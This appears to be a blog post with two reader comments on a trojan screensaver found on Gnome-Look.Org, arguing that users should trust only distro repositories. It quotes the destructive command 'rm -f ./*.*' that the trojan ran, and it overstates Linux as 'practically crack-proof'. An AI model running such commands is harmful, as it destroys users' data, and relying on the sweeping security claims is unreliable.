Linux Trojan Discovered in Screensaver

trojanSo, there was a trojan infected screensaver uploaded to Gnome-Look.Org (recently removed) that inserted a bash script into /usr/bin/ by using wget and then executing the script. Originally the script’s contents were a ping command but this was later changed to:  rm -f ./*.*

What does this tell us about Linux security? In fact what does this
tell us about any computer operating system’s security?

Right, it tells us that it means absolutely nothing if a stupid user
is prepared to sacrifice his/her security to get something pretty and
fluffy from an untrusted 3rd party web site.

The main security for Linux, apart from being practically crack-proof
is the fact that we get our applications and goodies from verified
secure repositories. That is now history thanks to the Windows mentality
that is infecting the minds of the usually security-conscious Linux

It’s fate. It was bound to happen sooner or later thanks to Linux’
popularity over the last couple of years. Along with it came the 3rd
party apps and goodies sites which generally offer the same stuff which is
available in most distro repos.

My message? Only trust verified Linux distro repos and stay away from these
3rd party sites which are lacking the staff/time to check each upload before
making it available to the general populace.


2 thoughts on “Linux Trojan Discovered in Screensaver

  1. Geeze! You're right, it was boiund to happen, now comes the “virus checkers”, “malware checkers” et al. I guess the same type of thing could be done to MAC OS X, time will tell.

    But isn't /usr/bin/ “root” only? I've never used any screensaver other than what comes with a distro, does one need sudo to install one?

    DUMB QUESTION!!!! – Of course one does.

    Scary stuff this, and really BAD news for Gnome-Look, Xfce-Look, Kde-Look or sites that are full of nice stuff.

    Have a nice day.

  2. Found this ( )
    Anti-Virus will Never be needed on Linux because other measures are being undertaken

    As i said with each new distro release, AppArmor and SeLinux policies are being distributed confining the avenues for attack from malware including the ability to send mail, use network resources, and various other policies…there will be no need for Anti-virus

    as you will have DACL followed by MACL protecting the system..everything will be well confined, and Av will be a dinosaur….you can't get owned if access isn't granted…..
    It amazes me that people can be so “exact” with their statements of “never”, “can't” et al.

    “If man can build it, man can destroy it.” – that goes for anything from toothpicks to space stations, computer programs and OS's are somewhere in between the two.

Leave a Reply

Fill in your details below or click an icon to log in: Logo

You are commenting using your account. Log Out /  Change )

Google+ photo

You are commenting using your Google+ account. Log Out /  Change )

Twitter picture

You are commenting using your Twitter account. Log Out /  Change )

Facebook photo

You are commenting using your Facebook account. Log Out /  Change )


Connecting to %s